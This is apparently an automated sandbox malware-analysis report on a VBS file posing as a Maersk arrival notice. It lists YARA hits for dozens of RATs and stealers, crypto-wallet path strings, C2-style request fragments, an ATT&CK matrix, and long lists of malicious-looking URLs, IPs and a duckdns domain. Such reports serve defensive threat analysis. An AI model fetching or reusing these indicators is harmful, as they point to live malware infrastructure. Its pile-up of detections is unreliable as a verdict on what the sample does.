Source: Yara match	File source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18300303304.00000138BE24D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18301189769.00000138BE6F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Betabot

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Codoso Ghost

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Growtopia

Show sources

Source: Yara match	File source: 00000026.00000003.18311707231.00000138BDDEB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: \Electrum-LTC\wallets\
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: !#ALF:TrojanSpy:AndroidOS/Exodus.A!MTB
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	String found in binary or memory: !#ALFPER:HSTR:MacOS/Ethereum.S!MTB
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: MpSigStub.exe, 00000026.00000003.18296654379.00000138BE355000.00000004.00000001.sdmp	String found in binary or memory: get_UseMachineKeyStore
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Remote Access Functionality:

Yara detected Snake Keylogger

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Evrial Stealer

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected GhostRat

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Mini RAT

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Koadic

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Hancitor

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Meterpreter

Show sources

Source: Yara match	File source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Arcane Stealer

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Vidar stealer

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Predator

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Detected HawkEye Rat

Show sources

Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: HawkEye_Keylogger_Keylog_Records_
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: HawkEyeKeylogger
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: HawkEyeKeylogger]

Detected Remcos RAT

Show sources

Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp

String found in binary or memory: Remcos_Mutex_Inj

Yara detected RevengeRAT

Show sources

Source: Yara match	File source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Metasploit Payload

Show sources

Source: Yara match

File source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, type: MEMORY

Yara detected Discord Token Stealer

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Parallax RAT

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Valak

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Detected Nanocore Rat

Show sources

Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp

String found in binary or memory: NanoCore.ClientPluginHost

Yara detected NetWire RAT

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Linux EvilGnome RC5 key

Show sources

Source: Yara match	File source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Pony

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Detected Imminent RAT

Show sources

Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp

String found in binary or memory: *\ClientPlugin\obj\Release\ClientPlugin.pdb

Yara detected Baldr

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Telegram RAT

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Njrat

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18300303304.00000138BE24D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18301189769.00000138BE6F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Betabot

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Codoso Ghost

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Growtopia

Show sources

Source: Yara match	File source: 00000026.00000003.18311707231.00000138BDDEB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Source: Yara match	File source: 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18340288495.00000138BCB46000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	String found in binary or memory: ?cmd=getload&
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: cmd=getload&login=
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: .php?cmd=login_submit&id=$praga$praga&session=$praga$praganame=chalbhaiid=chalbhaimethod=post>

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Replication Through Removable Media1	Scripting21	DLL Side-Loading11	DLL Side-Loading11	Disable or Modify Tools1	OS Credential Dumping1	System Time Discovery1	Replication Through Removable Media1	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact2
Default Accounts	Exploitation for Client Execution1	Windows Service11	Access Token Manipulation1	Deobfuscate/Decode Files or Information1	Credential API Hooking1	Peripheral Device Discovery1	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter1	Registry Run Keys / Startup Folder1	Windows Service11	Scripting21	Input Capture21	File and Directory Discovery3	SMB/Windows Admin Shares	Credential API Hooking1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Service Execution2	Logon Script (Mac)	Process Injection113	Obfuscated Files or Information4	NTDS	System Information Discovery15	Distributed Component Object Model	Input Capture21	Scheduled Transfer	Remote Access Software5	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Registry Run Keys / Startup Folder1	Software Packing3	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Timestomp1	Cached Domain Credentials	Security Software Discovery361	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol212	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	DLL Side-Loading11	DCSync	Virtualization/Sandbox Evasion23	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Proxy1	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	File Deletion11	Proc Filesystem	Process Discovery3	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading3	/etc/passwd and /etc/shadow	Application Window Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Virtualization/Sandbox Evasion23	Network Sniffing	System Network Configuration Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Access Token Manipulation1	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Process Injection113	Keylogging	Local Groups	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery
Compromise Hardware Supply Chain	Visual Basic	Scheduled Task	Scheduled Task	Hidden Users1	GUI Input Capture	Domain Groups	Exploitation of Remote Services	Email Collection	Commonly Used Port	Proxy			Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs	5%	Virustotal		Browse
Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs	13%	ReversingLabs	Script-WScript.Trojan.Valyria

Dropped Files

Source	Detection	Scanner	Link
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ConfigSecurityPolicy.exe	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\DefenderCSP.dll	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdBoot.sys	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdDevFlt.sys	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdFilter.sys	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdNisDrv.sys	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpAsDesc.dll	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpAzSubmit.dll	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpClient.dll	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpCmdRun.exe	0%	Metadefender	Browse
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpCmdRun.exe	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpCommu.dll	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpCopyAccelerator.exe	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpDetours.dll	0%	Metadefender	Browse
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpDetours.dll	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpDetoursCopyAccelerator.dll	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpDlpCmd.exe	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpEvMsg.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
38.3.MpSigStub.exe.138be22418a.26.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
38.3.MpSigStub.exe.138bdac8e06.63.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
38.3.MpSigStub.exe.138be22418a.58.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
38.3.MpSigStub.exe.138be1deebe.25.unpack	100%	Avira	JS/Redirector.FX	Download File
38.3.MpSigStub.exe.138be0f8156.48.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
38.3.MpSigStub.exe.138be0f8156.173.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
38.3.MpSigStub.exe.138bd29a3ba.136.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
38.3.MpSigStub.exe.138bcce283a.74.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
38.3.MpSigStub.exe.138bdac8e06.213.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
38.3.MpSigStub.exe.138bcd0731e.140.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
38.3.MpSigStub.exe.138bdac8e06.95.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
38.3.MpSigStub.exe.138bd0af157.153.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
38.3.MpSigStub.exe.138be0f8156.32.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
38.3.MpSigStub.exe.138bcce32d4.72.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
38.3.MpSigStub.exe.138bcce283a.167.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
38.3.MpSigStub.exe.138be19fadd.13.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
38.3.MpSigStub.exe.138be1deebe.15.unpack	100%	Avira	JS/Redirector.FX	Download File
38.3.MpSigStub.exe.138be26cad6.50.unpack	100%	Avira	TR/Patched.Ren.Gen2	Download File
38.3.MpSigStub.exe.138bde736d2.82.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
38.3.MpSigStub.exe.138bcce32d4.166.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
38.3.MpSigStub.exe.138bcce2d87.168.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
38.3.MpSigStub.exe.138bd0acad5.154.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
38.3.MpSigStub.exe.138bcce2d87.73.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
38.3.MpSigStub.exe.138be4ca38f.133.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.bonusesfound.ml/update/index.php	13%	Virustotal		Browse
http://www.bonusesfound.ml/update/index.php	0%	Avira URL Cloud	safe
http://www.cooctdlfast.com/download.php?	3%	Virustotal		Browse
http://www.cooctdlfast.com/download.php?	0%	Avira URL Cloud	safe
http://110.42.4.180:	13%	Virustotal		Browse
http://110.42.4.180:	0%	Avira URL Cloud	safe
http://stmichaelolivewood.com/templates/landofchrist/css/msg.jpg	0%	Avira URL Cloud	safe
http://minetopsforums.ru/new_link3.php?site=	0%	Avira URL Cloud	safe
https://zangomart.com/soft/order/information/adobe2/index.htm	0%	Avira URL Cloud	safe
http://today-friday.cn/maran/sejvan/get.php	0%	Avira URL Cloud	safe
http://Yyl.mofish.cn/interface/SeedInstall.aspx	0%	Avira URL Cloud	safe
https://communitymanageragency.com/wp-admin/css/colors/light/report-pdf.php	0%	Avira URL Cloud	safe
http://ati.vn	0%	Avira URL Cloud	safe
http://errors.statsmyapp.comxa	0%	Avira URL Cloud	safe
http://www.chambersign.org1	0%	Avira URL Cloud	safe
http://tempuri.org/	0%	Avira URL Cloud	safe
http://185.172.110.217/robx/remit.jpg	0%	Avira URL Cloud	safe
https://anonfiles.com/	0%	Avira URL Cloud	safe
http://www.whitehouseknutsford.co.uk/invoice-status/please-pull-invoice-684594/	0%	Avira URL Cloud	safe
https://sumnermail.org/sumnerscools/school.php	0%	Avira URL Cloud	safe
http://139.162.	0%	Avira URL Cloud	safe
http://rghost.net/download/	0%	Avira URL Cloud	safe
http://install.outbrowse.com/logTrack.php?x	0%	Avira URL Cloud	safe
http://usa-national.info/gpu/band/grumble.dot	0%	Avira URL Cloud	safe
http://w.robints.us/cnzz.htmlwidth=0height=0	0%	Avira URL Cloud	safe
https://jovial-pasteur.159-89-118-202.plesk.page/wp-content/uploads/index.php	0%	Avira URL Cloud	safe
http://canonicalizer.ucsuri.tcs/3	0%	Avira URL Cloud	safe
http://mexicorxonline.com/glad/imagenes.html?disc=abuse&code=7867213	0%	Avira URL Cloud	safe
http://spywaresoftstop.com/load.php?adv=141	0%	Avira URL Cloud	safe
https://sotheraho.com/wp-content/fonts/reportexcelnew.php	0%	Avira URL Cloud	safe
http://walden.co.jp/wp/divorce/divorce.php?id=zxjpyy5tb3jyaxnvb	0%	Avira URL Cloud	safe
http://eduardovolpi.com.br/flipbook/postal/services/parcel)	0%	Avira URL Cloud	safe
https://sweetsizing.com/vip/	0%	Avira URL Cloud	safe
http://security-updater.com/binaries/	0%	Avira URL Cloud	safe
http://5starvideos.com/main/K5	0%	Avira URL Cloud	safe
http://77.81.225.138/carnaval2017.zip	0%	Avira URL Cloud	safe
http://www.slotch.com/ist/softwares/v4.0/istdownload.exe	0%	Avira URL Cloud	safe
https://go.wikitextbooks.info	0%	Avira URL Cloud	safe
https://bemojo.com/ds/161120.gif	0%	Avira URL Cloud	safe
http://avnpage.info/final3.php	0%	Avira URL Cloud	safe
http://esiglass.it/glassclass/glass.php	0%	Avira URL Cloud	safe
https://xmrig.com/wizard	0%	Avira URL Cloud	safe
https://rotf.lol/3u6d9443	0%	Avira URL Cloud	safe
https://kiwisanagustin.com/wp-admin/includes/opo.php%22%20method%3d%22post%22%20style%3d%22box-sizin	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/	0%	Avira URL Cloud	safe
http://m.mworld.vn/MWorld30/data20.xm?a=getip&g=3&sex=Android	0%	Avira URL Cloud	safe
http://www.51jetso.com/	0%	Avira URL Cloud	safe
http://www.searchmaid.com/	0%	Avira URL Cloud	safe
http://tbapi.search.ask.comxb	0%	Avira URL Cloud	safe
http://www.mva.by/tags/ariscanin1.e	0%	Avira URL Cloud	safe
http://javafx.com	0%	Avira URL Cloud	safe
http://masgiO.info/cd/cd.php?id=%s&ver=g	0%	Avira URL Cloud	safe
http://sds.clrsch.com/x	0%	Avira URL Cloud	safe
http://playsong.mediasongplayer.com/	0%	Avira URL Cloud	safe
http://tiasissi.com.br/revendedores/jquery/	0%	Avira URL Cloud	safe
http://207.154.225.82/report.json?type=mail&u=$muser&c=	0%	Avira URL Cloud	safe
http://www.xiuzhe.com/ddvan.exe	0%	Avira URL Cloud	safe
http://66.148.74.7/zu2/zc.php	0%	Avira URL Cloud	safe
http://t.zer9g.com/	0%	Avira URL Cloud	safe
http://149.3.170.235/qw-fad/	0%	Avira URL Cloud	safe
http://maringareservas.com.br/queda/index.php	0%	Avira URL Cloud	safe
http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc	100%	Avira URL Cloud	malware
http://82.98.235.	0%	Avira URL Cloud	safe
http://verred.net/?1309921	0%	Avira URL Cloud	safe
https://pigeonious.com/img/	0%	Avira URL Cloud	safe
http://team.afcorp.afg/chr/crt-ho_30/newjflibrary	0%	Avira URL Cloud	safe
http://data1.yoou8.com/	0%	Avira URL Cloud	safe
https://jabaltoor.com/copy/img/blog/cat-post/r7gnor1h0.php	0%	Avira URL Cloud	safe
http://handjobheats.com/xgi-bin/q.php	0%	Avira URL Cloud	safe
http://www.pcpurifier.com/buynow/?	0%	Avira URL Cloud	safe
http://www.chatzum.com/statistics/?affid=$RPT_AFFID&cztbid=$RPT_UID&inst=$RTP_SETINST&sethp=$RTP_SET	0%	Avira URL Cloud	safe
https://longurl.in/tllwu	0%	Avira URL Cloud	safe
https://safedental.org/wp-includes/css/report-maerskline.php	0%	Avira URL Cloud	safe
http://%63%61%39%78%2e%63%6f%6d/ken.gif	0%	Avira URL Cloud	safe
https://cdn4.buysellads.net/pub/tempmail.js?	0%	Avira URL Cloud	safe
http://memberservices.passport.net/memberservice.srf	0%	Avira URL Cloud	safe
http://www.mybrowserbar.com/cgi/coupons.cgi/	0%	Avira URL Cloud	safe
http://200.159.128.	0%	Avira URL Cloud	safe
http://www.sniperspy.com/guide.html	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
septnet.duckdns.org	193.104.197.90	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://110.42.4.180:	true	13%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/	true	Avira URL Cloud: safe	unknown
http://www.whitehouseknutsford.co.uk/invoice-status/please-pull-invoice-684594/	true	Avira URL Cloud: safe	unknown
http://www.trotux.com/?z=	false		high
http://avnisevinc.blogspot.com/	false		high
http://200.159.128.	true	Avira URL Cloud: safe	low
http://agressor58.blogspot.com/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.bonusesfound.ml/update/index.php	MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	true	13%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.cooctdlfast.com/download.php?	MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://stmichaelolivewood.com/templates/landofchrist/css/msg.jpg	MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://minetopsforums.ru/new_link3.php?site=	MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://zangomart.com/soft/order/information/adobe2/index.htm	MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://today-friday.cn/maran/sejvan/get.php	MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://Yyl.mofish.cn/interface/SeedInstall.aspx	MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://communitymanageragency.com/wp-admin/css/colors/light/report-pdf.php	MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
